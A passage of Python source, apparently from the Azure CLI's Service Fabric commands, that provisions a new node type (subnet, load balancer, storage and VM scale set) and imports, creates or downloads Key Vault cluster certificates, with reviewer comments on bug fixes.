                            client_connection_endpoint_port=DEFAULT_CLIENT_CONNECTION_ENDPOINT,
                            http_gateway_endpoint_port=DEFAULT_HTTP_GATEWAY_ENDPOINT,
                            is_primary=False,
                            vm_instance_count=int(capacity),
                            durability_level=durability_level,
                            application_ports=EndpointRangeDescription(
                                DEFAULT_APPLICATION_START_PORT, DEFAULT_APPLICATION_END_PORT),
                            ephemeral_ports=EndpointRangeDescription(
                                DEFAULT_EPHEMERAL_START, DEFAULT_EPHEMERAL_END)))
    patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
    poller = client.update(resource_group_name, cluster_name, patch_request)
    LongRunningOperation()(poller)

    # --- find a free 10.0.x.0/24 prefix and a unique subnet name --------
    subnet_name = "subnet_{}".format(1)
    network_client = network_client_factory()
    location = _get_resource_group_name(resource_group_name).location
    virtual_network = list(
        network_client.virtual_networks.list(resource_group_name))[0]
    subnets = list(network_client.subnets.list(
        resource_group_name, virtual_network.name))
    address_prefix = None
    index = None
    for x in range(1, 255):
        address_prefix = '10.0.{}.0/24'.format(x)
        index = x
        found = False
        for s in subnets:
            if address_prefix == s.address_prefix:
                found = True
            if subnet_name.lower() == s.name.lower():
                # Name collision: bump the suffix and keep probing.
                subnet_name = "subnet_{}".format(x)
        if found is False:
            break
    if address_prefix is None:
        raise CLIError("Failed to generate the address prefix")
    poller = network_client.subnets.create_or_update(
        resource_group_name, virtual_network.name, subnet_name,
        Subnet(address_prefix=address_prefix))
    subnet = LongRunningOperation()(poller)

    # --- public IP + load balancer --------------------------------------
    public_address_name = 'LBIP-{}-{}{}'.format(
        cluster_name.lower(), node_type.lower(), index)
    dns_label = '{}-{}{}'.format(cluster_name.lower(),
                                 node_type.lower(), index)
    lb_name = 'LB-{}-{}{}'.format(cluster_name.lower(),
                                  node_type.lower(), index)
    poller = network_client.public_ip_addresses.create_or_update(
        resource_group_name,
        public_address_name,
        PublicIPAddress(public_ip_allocation_method='Dynamic',
                        location=location,
                        dns_settings=PublicIPAddressDnsSettings(dns_label)))
    public_ip = LongRunningOperation()(poller)
    from azure.cli.core.commands.client_factory import get_subscription_id
    subscription_id = get_subscription_id()
    new_load_balancer_id = '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}'.format(
        subscription_id, resource_group_name, lb_name)
    backend_address_pool_name = "LoadBalancerBEAddressPool"
    frontendip_configuration_name = "LoadBalancerIPConfig"
    probe_name = "FabricGatewayProbe"
    probe_http_name = "FabricHttpGatewayProbe"
    inbound_nat_pools_name = "LoadBalancerBEAddressNatPool"

    def _lb_child_id(child_type, child_name):
        # ARM resource id of a child resource of the new load balancer.
        return '/subscriptions/{}/resourceGroups/{}/providers/Microsoft.Network/loadBalancers/{}/{}/{}'.format(
            subscription_id, resource_group_name, lb_name, child_type, child_name)

    new_load_balancer = LoadBalancer(
        id=new_load_balancer_id,
        location=location,
        frontend_ip_configurations=[FrontendIPConfiguration(
            name=frontendip_configuration_name,
            public_ip_address=PublicIPAddress(id=public_ip.id))],
        backend_address_pools=[BackendAddressPool(
            name=backend_address_pool_name)],
        load_balancing_rules=[
            LoadBalancingRule(name='LBRule',
                              backend_address_pool=NetworkSubResource(
                                  id=_lb_child_id('backendAddressPools', backend_address_pool_name)),
                              backend_port=DEFAULT_TCP_PORT,
                              enable_floating_ip=False,
                              frontend_ip_configuration=NetworkSubResource(
                                  id=_lb_child_id('frontendIPConfigurations', frontendip_configuration_name)),
                              frontend_port=DEFAULT_TCP_PORT,
                              idle_timeout_in_minutes=5,
                              protocol='tcp',
                              probe=NetworkSubResource(
                                  id=_lb_child_id('probes', probe_name))),
            LoadBalancingRule(name='LBHttpRule',
                              backend_address_pool=NetworkSubResource(
                                  id=_lb_child_id('backendAddressPools', backend_address_pool_name)),
                              backend_port=DEFAULT_HTTP_PORT,
                              enable_floating_ip=False,
                              frontend_ip_configuration=NetworkSubResource(
                                  id=_lb_child_id('frontendIPConfigurations', frontendip_configuration_name)),
                              frontend_port=DEFAULT_HTTP_PORT,
                              idle_timeout_in_minutes=5,
                              protocol='tcp',
                              probe=NetworkSubResource(
                                  id=_lb_child_id('probes', probe_http_name)))],
        probes=[Probe(protocol='tcp',
                      name=probe_name,
                      interval_in_seconds=5,
                      number_of_probes=2,
                      port=DEFAULT_TCP_PORT),
                Probe(protocol='tcp',
                      name=probe_http_name,
                      interval_in_seconds=5,
                      number_of_probes=2,
                      port=DEFAULT_HTTP_PORT)],
        inbound_nat_pools=[InboundNatPool(
            protocol='tcp',
            name=inbound_nat_pools_name,
            backend_port=DEFAULT_BACKEND_PORT,
            frontend_ip_configuration=NetworkSubResource(
                id=_lb_child_id('frontendIPConfigurations', frontendip_configuration_name)),
            frontend_port_range_start=DEFAULT_FRONTEND_PORT_RANGE_START,
            frontend_port_range_end=DEFAULT_FRONTEND_PORT_RANGE_END)])
    poller = network_client.load_balancers.create_or_update(
        resource_group_name, lb_name, new_load_balancer)
    LongRunningOperation()(poller)
    new_load_balancer = network_client.load_balancers.get(
        resource_group_name, lb_name)
    backend_address_pools = [SubResource(id=p.id)
                             for p in new_load_balancer.backend_address_pools]
    inbound_nat_pools = [SubResource(id=p.id)
                         for p in new_load_balancer.inbound_nat_pools]
    vm_network_profile = VirtualMachineScaleSetNetworkProfile(
        network_interface_configurations=[VirtualMachineScaleSetNetworkConfiguration(
            # NOTE(review): the original uses node_type twice in the NIC
            # name; presumably the first field was meant to be cluster_name.
            name='NIC-{}-{}'.format(node_type.lower(), node_type.lower()),
            primary=True,
            ip_configurations=[VirtualMachineScaleSetIPConfiguration(
                name='Nic-{}'.format(node_type.lower()),
                load_balancer_backend_address_pools=backend_address_pools,
                load_balancer_inbound_nat_pools=inbound_nat_pools,
                subnet=ApiEntityReference(id=subnet.id))])])
    compute_client = compute_client_factory()
    vmsses = list(compute_client.virtual_machine_scale_sets.list(
        resource_group_name))
    # Copy profile settings from an existing SF-enabled scale set.
    fabric_vmsses = [vm for vm in vmsses
                     if any(e for e in vm.virtual_machine_profile.extension_profile.extensions
                            if e.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME)]
    # robustness: raise a clear error instead of IndexError when none exists
    if not fabric_vmsses:
        raise CLIError("Failed to find service fabric extension")
    vmss = fabric_vmsses[0]

    def _create_storage_account(rg_name, storage_name, location):
        # Create a Standard_LRS storage account; return (properties, keys).
        from azure.mgmt.storage.models import Sku, SkuName
        storage_client = storage_client_factory()
        LongRunningOperation()(storage_client.storage_accounts.create(
            rg_name,
            storage_name,
            StorageAccountCreateParameters(Sku(SkuName.standard_lrs),
                                           'storage',
                                           location)))
        acc_prop = storage_client.storage_accounts.get_properties(
            rg_name, storage_name)
        acc_keys = storage_client.storage_accounts.list_keys(
            rg_name, storage_name)
        return acc_prop, acc_keys

    def _create_vhd_containers(rg_name, cluster_name, node_type, location):
        # Build a <=21-char alphanumeric prefix so '<prefix><i>' stays within
        # the 24-character storage-account name limit, then create five
        # accounts holding the OS-disk VHD containers.
        raw = '{}{}'.format(cluster_name.lower(), node_type.lower())
        name = ""
        for n in raw:
            if n.isalpha() or n.isdigit():
                name += n
            if len(name) >= 21:
                break
        vhds = []
        for i in range(1, 6):
            # bug fix: use the sanitized, truncated prefix; the original
            # computed it but then used the raw (possibly too long) prefix.
            acc = _create_storage_account(
                rg_name.lower(), '{}{}'.format(name, i), location)
            vhds.append('{}{}'.format(acc[0].primary_endpoints.blob, 'vhd'))
        return vhds

    # --- OS image selection ---------------------------------------------
    publisher = 'MicrosoftWindowsServer'
    offer = 'WindowsServer'
    version = 'latest'
    sku = os_dic[DEFAULT_OS]
    if cluster.vm_image.lower() == 'linux':
        publisher = 'Microsoft.Azure.ServiceFabric'
        offer = 'UbuntuServer'
        version = '6.0.11'
        sku = os_dic['UbuntuServer1604']
    storage_profile = VirtualMachineScaleSetStorageProfile(
        image_reference=ImageReference(publisher=publisher,
                                       offer=offer,
                                       sku=sku,
                                       version=version),
        os_disk=VirtualMachineScaleSetOSDisk(
            caching='ReadOnly',
            create_option='FromImage',
            name='vmssosdisk',
            vhd_containers=_create_vhd_containers(
                resource_group_name, cluster_name, node_type, location)))
    os_profile = VirtualMachineScaleSetOSProfile(
        computer_name_prefix=node_type,
        admin_password=vm_password,
        admin_username=vm_user_name,
        secrets=vmss.virtual_machine_profile.os_profile.secrets)

    # --- clone diagnostics / Service Fabric extensions -------------------
    diagnostics_storage_name = cluster.diagnostics_storage_account_config.storage_account_name
    diagnostics_ext = None
    diagnostics_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions
                        if e.type.lower() == 'IaaSDiagnostics'.lower()]
    if diagnostics_exts:
        diagnostics_ext = diagnostics_exts[0]
        diagnostics_account = diagnostics_ext.settings['StorageAccount']
        storage_client = storage_client_factory()
        list_results = storage_client.storage_accounts.list_keys(
            resource_group_name, diagnostics_account)
        # Dict literal replaces the original json.loads-of-a-template.
        diagnostics_ext.protected_settings = {
            'storageAccountName': diagnostics_account,
            'storageAccountKey': list_results.keys[0].value,
            'storageAccountEndPoint': "https://core.windows.net/",
        }
    fabric_exts = [e for e in vmss.virtual_machine_profile.extension_profile.extensions
                   if e.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or e.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
    if not fabric_exts:
        raise CLIError("No valid fabric extension found")
    fabric_ext = fabric_exts[0]
    fabric_ext.settings['nodeTypeRef'] = node_type
    fabric_ext.settings['durabilityLevel'] = durability_level
    # bug fix: .get avoids a KeyError when 'nicPrefixOverride' is absent.
    if fabric_ext.settings.get('nicPrefixOverride'):
        fabric_ext.settings['nicPrefixOverride'] = address_prefix
    storage_client = storage_client_factory()
    list_results = storage_client.storage_accounts.list_keys(
        resource_group_name, diagnostics_storage_name)
    fabric_ext.protected_settings = {
        'StorageAccountKey1': list_results.keys[0].value,
        'StorageAccountKey2': list_results.keys[1].value,
    }
    extensions = [fabric_ext]
    if diagnostics_ext:
        extensions.append(diagnostics_ext)
    vm_ext_profile = VirtualMachineScaleSetExtensionProfile(
        extensions=extensions)
    virtual_machine_scale_set_profile = VirtualMachineScaleSetVMProfile(
        extension_profile=vm_ext_profile,
        os_profile=os_profile,
        storage_profile=storage_profile,
        network_profile=vm_network_profile)
    poller = compute_client.virtual_machine_scale_sets.create_or_update(
        resource_group_name,
        node_type,
        VirtualMachineScaleSet(location=location,
                               sku=ComputeSku(vm_sku, vm_tier, capacity),
                               overprovision=False,
                               upgrade_policy=UpgradePolicy(
                                   mode=UpgradeMode.automatic),
                               virtual_machine_profile=virtual_machine_scale_set_profile))
    LongRunningOperation()(poller)
    return client.get(resource_group_name, cluster_name)
def _verify_cert_function_parameter(certificate_file=None,
certificate_password=None,
vault_name=None, # pylint: disable=unused-argument
vault_resource_group_name=None, # pylint: disable=unused-argument
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
if certificate_file:
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--certificate-file\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--certificate-file\' is present')
else:
if secret_identifier:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if certificate_password:
raise CLIError(
'\'--certificate-password\' is ingored if \'--secret-identifier\' is present')
if certificate_output_folder:
raise CLIError(
'\'--certificate-output-folder\' is ingored if \'--secret-identifier\' is present')
if certificate_subject_name:
raise CLIError(
'\'--certificate-subject-name\' is ingored if \'--secret-identifier\' is present')
else:
if certificate_subject_name:
if certificate_file:
raise CLIError(
'\'--certificate-file\' is ingored if \'--secret-identifier\' is present')
if secret_identifier:
raise CLIError(
'\'--secret-identifier\' is ingored if \'--secret-identifier\' is present')
else:
raise CLIError("Invalid input")
def _create_certificate(resource_group_name,
                        certificate_file=None,
                        certificate_password=None,
                        vault_name=None,
                        vault_resource_group_name=None,
                        certificate_output_folder=None,
                        certificate_subject_name=None,
                        secret_identifier=None):
    """Obtain (or create) a cluster certificate backed by Key Vault.

    Three mutually exclusive sources, validated up front by
    _verify_cert_function_parameter:
      * secret_identifier        -- reuse an existing Key Vault secret
      * certificate_file         -- import a local certificate into a vault
      * certificate_subject_name -- create a self-signed certificate

    :return: tuple (vault_id, secret_url, certificate_thumbprint,
        output_file); output_file is only set on the self-signed path (it is
        None otherwise).
    """
    _verify_cert_function_parameter(certificate_file, certificate_password,
                                    vault_name, vault_resource_group_name,
                                    certificate_output_folder,
                                    certificate_subject_name,
                                    secret_identifier)
    output_file = None
    # The vault is placed in the resource group's location.
    rg = _get_resource_group_name(resource_group_name)
    location = rg.location
    vault_id = None
    secret_url = None
    certificate_thumbprint = None
    if secret_identifier is not None:
        # Reuse an existing secret: resolve its vault and thumbprint only.
        vault = _get_vault_from_secret_identifier(secret_identifier)
        vault_id = vault.id
        certificate_thumbprint = _get_thumbprint_from_secret_identifier(
            vault, secret_identifier)
        secret_url = secret_identifier
    else:
        if certificate_file is not None:
            # Import the local certificate file into a key vault.
            vault_name = _get_vault_name(resource_group_name, vault_name)
            logger.info("Creating key vault")
            vault = _create_keyvault(
                vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
            vault_uri = vault.properties.vault_uri
            certificate_name = _get_certificate_name(resource_group_name)
            logger.info("Import certificate")
            result = import_certificate(
                vault_uri, certificate_name, certificate_file, password=certificate_password)
            vault_id = vault.id
            secret_url = result.sid
            import base64
            # x509_thumbprint is raw bytes; b64-encode then convert to hex.
            certificate_thumbprint = b64_to_hex(
                base64.b64encode(result.x509_thumbprint))
        else:
            # Self-signed path: default the vault to the cluster's group/name.
            if vault_resource_group_name is None:
                vault_resource_group_name = resource_group_name
            if vault_name is None:
                vault_name = resource_group_name
            logger.info("Creating key vault")
            vault = _create_keyvault(
                vault_resource_group_name, vault_name, location, enabled_for_deployment=True)
            logger.info("Wait for key vault ready")
            # NOTE(review): fixed sleep, presumably to let the new vault
            # propagate before use -- confirm whether this is still needed.
            time.sleep(20)
            vault_uri = vault.properties.vault_uri
            certificate_name = _get_certificate_name(resource_group_name)
            policy = _get_default_policy(certificate_subject_name)
            logger.info("Creating self-signed certificate")
            result = _create_self_signed_key_vault_certificate(
                vault_uri, certificate_name, policy, certificate_output_folder=certificate_output_folder)
            kv_result = result[0]
            output_file = result[1]
            vault_id = vault.id
            secret_url = kv_result.sid
            import base64
            certificate_thumbprint = b64_to_hex(
                base64.b64encode(kv_result.x509_thumbprint))
    return vault_id, secret_url, certificate_thumbprint, output_file
def _add_cert_to_vmss(vmss, resource_group_name, vault_id, secret_url):
    """Ensure a VM scale set references the given Key Vault certificate.

    Adds ``secret_url`` (certificate store 'my') to the secret group for
    ``vault_id``, creating the group if necessary, then pushes the updated
    model with create_or_update.

    :return: the completed update result, or None when the certificate was
        already present and no update was needed.
    """
    compute_client = compute_client_factory()
    os_profile = vmss.virtual_machine_profile.os_profile
    matching_groups = [
        s for s in os_profile.secrets if s.source_vault.id == vault_id]
    # BUG FIX: the original tested `secrets is not None` / `certs is None` on
    # list-comprehension results, which are never None. That made the
    # "no matching group" and "cert missing" branches unreachable, so the
    # certificate was never actually appended.
    if matching_groups:
        group = matching_groups[0]
        if group.vault_certificates is not None:
            already_present = [
                c for c in group.vault_certificates if c.certificate_url == secret_url]
            if already_present:
                return None  # nothing to do; skip the ARM round-trip
            group.vault_certificates.append(VaultCertificate(secret_url, 'my'))
        else:
            group.vault_certificates = [VaultCertificate(secret_url, 'my')]
    else:
        # No group for this vault yet: append one, preserving any existing
        # secret groups (the original dead branch reset the whole list).
        if os_profile.secrets is None:
            os_profile.secrets = []
        os_profile.secrets.append(
            VaultSecretGroup(SubResource(vault_id),
                             [VaultCertificate(secret_url, 'my')]))
    poller = compute_client.virtual_machine_scale_sets.create_or_update(
        resource_group_name, vmss.name, vmss)
    return LongRunningOperation()(poller)
def _add_cert_to_all_vmss(resource_group_name, vault_id, secret_url):
    """Add the certificate to every VM scale set in the group, in parallel.

    One worker thread per scale set; blocks until all updates complete.
    """
    import threading
    compute_client = compute_client_factory()
    # list() always returns a list, so the original `is not None` guard was
    # vacuous; an empty group simply spawns no threads.
    vmsses = list(compute_client.virtual_machine_scale_sets.list(
        resource_group_name))
    threads = [
        threading.Thread(target=_add_cert_to_vmss,
                         args=(vmss, resource_group_name, vault_id, secret_url))
        for vmss in vmsses]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
def _get_resource_group_name(resource_group_name):
    """Fetch the ResourceGroup object for the given name.

    Returns None on most lookup failures; re-raises in a branch that looks
    intended for "resource group not found" (see review notes below).
    """
    try:
        resouce_client = resource_client_factory().resource_groups
        return resouce_client.get(resource_group_name)
    except Exception as ex:  # pylint: disable=broad-except
        # NOTE(review): 'Azure Error' (with a space) can never be a Python
        # attribute name, so `error` is almost certainly the exception object
        # itself, which never equals the string below -- every failure
        # therefore returns None. Also the comparison looks inverted
        # (one would expect NotFound -> None, others -> raise). Confirm the
        # intended attribute and condition before changing behavior.
        error = getattr(ex, 'Azure Error', ex)
        if error != 'ResourceGroupNotFound':
            return None
        else:
            raise
def _create_resource_group_name(rg_name, location, tags=None):
    """Create (or update) the resource group ``rg_name`` in ``location``."""
    from azure.mgmt.resource.resources.models import ResourceGroup
    resource_groups = resource_client_factory().resource_groups
    resource_groups.create_or_update(
        rg_name, ResourceGroup(location=location, tags=tags))
def _get_target_instance(reliability_level):
level = reliability_level.lower()
if level == 'none':
return 1
if level == 'bronze':
return 3
if level == 'silver':
return 5
if level == 'gold':
return 7
if level == 'platinum':
return 9
def _get_reliability_level(cluster_size):
size = int(cluster_size)
if size > 0 and size < 3:
return 'None'
if size >= 3 and size < 5:
return 'Bronze'
if size >= 5 and size < 7:
return 'Silver'
if size >= 7 and size < 9:
return 'Gold'
if size >= 9:
return 'Platinum'
def _fabric_settings_to_dict(fabric_settings):
d = {}
if fabric_settings:
for s1 in fabric_settings:
section_name = s1.name
if section_name not in d:
d[section_name] = {}
if s1.parameters:
for s2 in s1.parameters:
parameter_name = s2.name
d[section_name][parameter_name] = s2.value
return d
def _dict_to_fabric_settings(setting_dict):
    """Inverse of _fabric_settings_to_dict: build SettingsSectionDescription
    objects from a {section: {param: value}} mapping.

    Sections that end up with no parameters are dropped, matching the
    original behavior.
    """
    settings = []
    if setting_dict and any(setting_dict):
        for section_name, params in setting_dict.items():
            description = SettingsSectionDescription(section_name, [])
            description.parameters.extend(
                SettingsParameterDescription(param_name, param_value)
                for param_name, param_value in params.items())
            if description.parameters and any(description.parameters):
                settings.append(description)
    return settings
def _deploy_arm_template_core(resource_group_name,
                              template,
                              parameters,
                              deployment_name=None,
                              mode='incremental',
                              validate_only=False,
                              no_wait=False):
    """Validate or deploy an ARM template into a resource group.

    When ``validate_only`` is set, returns the validation result; otherwise
    starts the deployment and waits for it via LongRunningOperation.
    """
    from azure.mgmt.resource.resources.models import DeploymentProperties
    properties = DeploymentProperties(template=template,
                                      template_link=None,
                                      parameters=parameters,
                                      mode=mode)
    client = resource_client_factory()
    if validate_only:
        return client.deployments.validate(
            resource_group_name, deployment_name, properties, raw=no_wait)
    poller = client.deployments.create_or_update(
        resource_group_name, deployment_name, properties, raw=no_wait)
    return LongRunningOperation()(poller)
def _get_vault_name(resource_group_name, vault_name):
if not vault_name:
return resource_group_name
return vault_name
# pylint: disable=unused-argument
def _get_certificate_name(resource_group_name):
certificate_name = resource_group_name
name = ""
for n in certificate_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
certificate_name = name
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
return "{}{}".format(certificate_name, suffix)
def _get_vault_from_secret_identifier(secret_identifier):
    """Find the ARM vault object whose name matches the host of a secret URL.

    ``secret_identifier`` is a Key Vault secret URL such as
    https://<vault-name>.vault.azure.net/secrets/<name>/<version>.
    """
    key_vault_client = keyvault_client_factory().vaults
    # The vault name is the first label of the secret URL's hostname.
    vault_name = urlparse(secret_identifier).hostname.split('.')[0]
    vaults = key_vault_client.list()
    if vaults is not None:
        # NOTE(review): raises IndexError when no vault matches the name, and
        # implicitly returns None when list() yields None -- callers
        # immediately dereference the result. Confirm whether a CLIError
        # would be more appropriate here.
        vault = [v for v in vaults if v.name == vault_name]
        return vault[0]
def _get_vault_uri_and_resource_group_name(vault):
    """Resolve a vault's data-plane URI plus the resource group it lives in.

    The resource group is parsed out of the vault's ARM id
    (/subscriptions/<sub>/resourceGroups/<rg>/... -> segment 4).
    """
    vaults_client = keyvault_client_factory().vaults
    vault_resource_group_name = vault.id.split('/')[4]
    full_vault = vaults_client.get(vault_resource_group_name, vault.name)
    return full_vault.properties.vault_uri, vault_resource_group_name
def _asn1_to_iso8601(asn1_date):
import dateutil.parser
if isinstance(asn1_date, bytes):
asn1_date = asn1_date.decode('utf-8')
return dateutil.parser.parse(asn1_date)
def _get_thumbprint_from_secret_identifier(vault, secret_identifier):
    """Compute the SHA-1 thumbprint of the certificate stored at a secret URL.

    Downloads the secret value from the vault, parses it as base64 PKCS#12
    (falling back to PEM text) and returns the hex thumbprint without ':'
    separators.
    """
    # Secret URL path looks like /secrets/<name>/<version>.
    secret_uri = urlparse(secret_identifier)
    path = secret_uri.path
    segment = path.split('/')
    secret_name = segment[2]
    secret_version = segment[3]
    vault_uri_group = _get_vault_uri_and_resource_group_name(vault)
    vault_uri = vault_uri_group[0]
    client_not_arm = _get_keyVault_not_arm_client()
    secret = client_not_arm.get_secret(vault_uri, secret_name, secret_version)
    cert_bytes = secret.value
    x509 = None
    import base64
    decoded = base64.b64decode(cert_bytes)
    try:
        # Key Vault certificates are usually stored as base64 PKCS#12 blobs.
        x509 = crypto.load_pkcs12(decoded).get_certificate()
    except (ValueError, crypto.Error):
        pass
    if not x509:
        # Fall back to treating the raw secret value as PEM text.
        x509 = crypto.load_certificate(crypto.FILETYPE_PEM, cert_bytes)
    if not x509:
        raise Exception('invalid certificate')
    thumbprint = x509.digest("sha1").decode("utf-8").replace(':', '')
    return thumbprint
def _get_certificate(client, vault_base_url, certificate_name):
""" Download a certificate from a KeyVault. """
cert = client.get_certificate(vault_base_url, certificate_name, '')
return cert
def import_certificate(vault_base_url, certificate_name, certificate_data,
                       disabled=False, password=None, certificate_policy=None, tags=None):
    """Import a .pem or .pfx certificate file into a Key Vault.

    :param vault_base_url: URI of the target vault.
    :param certificate_name: name for the imported certificate.
    :param certificate_data: path of the certificate file on disk.
    :param disabled: create the certificate in a disabled state.
    :param password: password for an encrypted .pfx, if any.
    :param certificate_policy: optional policy dict; its secret_properties
        content_type is set to the detected type.
    :param tags: optional tags for the vault object.
    :raises CLIError: when the file is neither valid PEM nor PKCS#12.
    """
    import binascii
    # Close the file handle promptly (the original leaked it).
    with open(certificate_data, 'rb') as cert_file:
        certificate_data = cert_file.read()
    x509 = None
    content_type = None
    try:
        x509 = crypto.load_certificate(crypto.FILETYPE_PEM, certificate_data)
        # if we get here, we know it was a PEM file
        content_type = 'application/x-pem-file'
        try:
            # for PEM files (including automatic endline conversion for
            # Windows)
            certificate_data = certificate_data.decode(
                'utf-8').replace('\r\n', '\n')
        except UnicodeDecodeError:
            certificate_data = binascii.b2a_base64(
                certificate_data).decode('utf-8')
    except (ValueError, crypto.Error):
        pass
    if not x509:
        try:
            if password:
                x509 = crypto.load_pkcs12(
                    certificate_data, password).get_certificate()
            else:
                x509 = crypto.load_pkcs12(certificate_data).get_certificate()
            content_type = 'application/x-pkcs12'
            certificate_data = binascii.b2a_base64(
                certificate_data).decode('utf-8')
        except crypto.Error:
            raise CLIError(
                'We could not parse the provided certificate as .pem or .pfx. Please verify the certificate with OpenSSL.')  # pylint: disable=line-too-long
    not_before, not_after = None, None
    if x509.get_notBefore():
        not_before = _asn1_to_iso8601(x509.get_notBefore())
    if x509.get_notAfter():
        not_after = _asn1_to_iso8601(x509.get_notAfter())
    cert_attrs = CertificateAttributes(enabled=not disabled,
                                       not_before=not_before,
                                       expires=not_after)
    # Attach the detected content type to the policy. BUG FIX: the original
    # `elif certificate_policy and not secret_props` branch was unreachable
    # (shadowed by the first `if`) and referenced `secret_props` before
    # assignment; a policy without secret_properties is now handled here.
    if certificate_policy:
        secret_props = certificate_policy.get('secret_properties')
        if secret_props:
            secret_props['content_type'] = content_type
        else:
            certificate_policy['secret_properties'] = SecretProperties(
                content_type=content_type)
    else:
        certificate_policy = CertificatePolicy(
            secret_properties=SecretProperties(content_type=content_type))
    logger.info("Starting 'keyvault certificate import'")
    client_not_arm = _get_keyVault_not_arm_client()
    result = client_not_arm.import_certificate(vault_base_url=vault_base_url,
                                               certificate_name=certificate_name,
                                               base64_encoded_certificate=certificate_data,
                                               certificate_attributes=cert_attrs,
                                               certificate_policy=certificate_policy,
                                               tags=tags,
                                               password=password)
    logger.info("Finished 'keyvault certificate import'")
    return result
def _download_secret(vault_base_url, secret_name, pem_path, pfx_path, encoding=None, secret_version=''):  # pylint: disable=unused-argument
    """Download a certificate secret and write it as .pem and/or .pfx files.

    The secret value is expected to be a base64-encoded PKCS#12 blob. The
    .pem output contains the private key, the certificate, and any CA chain;
    the .pfx output is the raw decoded blob. A partially written file is
    removed before the error is re-raised.
    """
    client = _get_keyVault_not_arm_client()
    secret = client.get_secret(vault_base_url, secret_name, secret_version)
    secret_value = secret.value
    if pem_path:
        try:
            import base64
            decoded = base64.b64decode(secret_value)
            p12 = crypto.load_pkcs12(decoded)
            # 'with' guarantees the handle is closed even if a dump fails
            # (the original leaked the handle on exception).
            with open(pem_path, 'wb') as f_pem:
                f_pem.write(crypto.dump_privatekey(
                    crypto.FILETYPE_PEM, p12.get_privatekey()))
                f_pem.write(crypto.dump_certificate(
                    crypto.FILETYPE_PEM, p12.get_certificate()))
                ca_certs = p12.get_ca_certificates()
                if ca_certs is not None:
                    for cert in ca_certs:
                        f_pem.write(crypto.dump_certificate(
                            crypto.FILETYPE_PEM, cert))
        except Exception as ex:  # pylint: disable=broad-except
            if os.path.isfile(pem_path):
                os.remove(pem_path)
            raise ex
    if pfx_path:
        try:
            import base64
            decoded = base64.b64decode(secret_value)
            # Validate the blob before writing (the original bound the parse
            # result to an unused variable).
            crypto.load_pkcs12(decoded)
            with open(pfx_path, 'wb') as f_pfx:
                f_pfx.write(decoded)
        except Exception as ex:  # pylint: disable=broad-except
            if os.path.isfile(pfx_path):
                os.remove(pfx_path)
            raise ex
def _get_default_policy(subject):  # pylint: disable=unused-argument
    """Build the default self-signed certificate policy, normalizing the
    subject to distinguished-name form ("CN=<subject>") when it does not
    already start with "cn" (case-insensitive)."""
    # `startswith(...) is not True` was a needless identity comparison.
    if not subject.lower().startswith('cn'):
        subject = "CN={0}".format(subject)
    return _default_certificate_profile(subject)
def _default_certificate_profile(subject):
    """Return the default CertificatePolicy for a self-signed cluster cert.

    Exportable 2048-bit RSA key, PKCS#12 secret, 12-month validity,
    auto-renew 90 days before expiry, self-issued.
    """
    template = CertificatePolicy(key_properties=KeyProperties(exportable=True,
                                                              key_type=u'RSA',
                                                              key_size=2048,
                                                              reuse_key=True),
                                 secret_properties=SecretProperties(
                                     content_type=u'application/x-pkcs12'),
                                 x509_certificate_properties=X509CertificateProperties(key_usage=[KeyUsageType.c_rl_sign,
                                                                                                 KeyUsageType.data_encipherment,
                                                                                                 KeyUsageType.digital_signature,
                                                                                                 KeyUsageType.key_encipherment,
                                                                                                 KeyUsageType.key_agreement,
                                                                                                 KeyUsageType.key_cert_sign],
                                                                                      subject=subject,
                                                                                      validity_in_months=12),
                                 lifetime_actions=[LifetimeAction(trigger=Trigger(days_before_expiry=90),
                                                                  action=Action(action_type=ActionType.auto_renew))],
                                 issuer_parameters=IssuerParameters(
                                     name=u'Self',),
                                 attributes=CertificateAttributes(enabled=True))
    return template
def _create_self_signed_key_vault_certificate(vault_base_url, certificate_name, certificate_policy, certificate_output_folder=None, disabled=False, tags=None, validity=None):
    # Kicks off a Key Vault certificate creation, polls until the vault
    # reports completion, and optionally downloads the result as .pem/.pfx
    # files into certificate_output_folder.
    # Returns (certificate bundle, pem_output_path or None).
    cert_attrs = CertificateAttributes(not disabled)
    logger.info("Starting long running operation 'keyvault certificate create'")
    if validity is not None:
        certificate_policy['x509_certificate_properties']['validity_in_months'] = validity
    client = _get_keyVault_not_arm_client()
    client.create_certificate(
        vault_base_url, certificate_name, certificate_policy, cert_attrs, tags)
    # otherwise loop until the certificate creation is complete
    while True:
        check = client.get_certificate_operation(
            vault_base_url, certificate_name)
        if check.status != 'inProgress':
            logger.info("Long running operation 'keyvault certificate create' finished with result %s.",
                        check)  # pylint: disable=line-too-long
            break
        try:
            # Poll every 10 seconds; Ctrl-C aborts the wait.
            time.sleep(10)
        except KeyboardInterrupt:
            logger.info("Long running operation wait cancelled.")
            raise
        except Exception as client_exception:
            # Surface the service's detailed error message when available.
            message = getattr(client_exception, 'message', client_exception)
            import json
            try:
                message = str(message) + ' ' + json.loads(
                    client_exception.response.text)['error']['details'][0]['message']  # pylint: disable=no-member
            except:  # pylint: disable=bare-except
                pass
            raise CLIError('{}'.format(message))
    pem_output_folder = None
    if certificate_output_folder is not None:
        pem_output_folder = os.path.join(
            certificate_output_folder, certificate_name + '.pem')
        pfx_output_folder = os.path.join(
            certificate_output_folder, certificate_name + '.pfx')
        _download_secret(vault_base_url, certificate_name,
                         pem_output_folder, pfx_output_folder)
    return client.get_certificate(vault_base_url, certificate_name, ''), pem_output_folder
# Reuse the SDK's docstring for this wrapper.
_create_self_signed_key_vault_certificate.__doc__ = KeyVaultClient.create_certificate.__doc__
def _get_keyVault_not_arm_client():
    """Build a data-plane KeyVaultClient (vault-URL based, not ARM) that
    authenticates with the CLI's cached login credentials."""
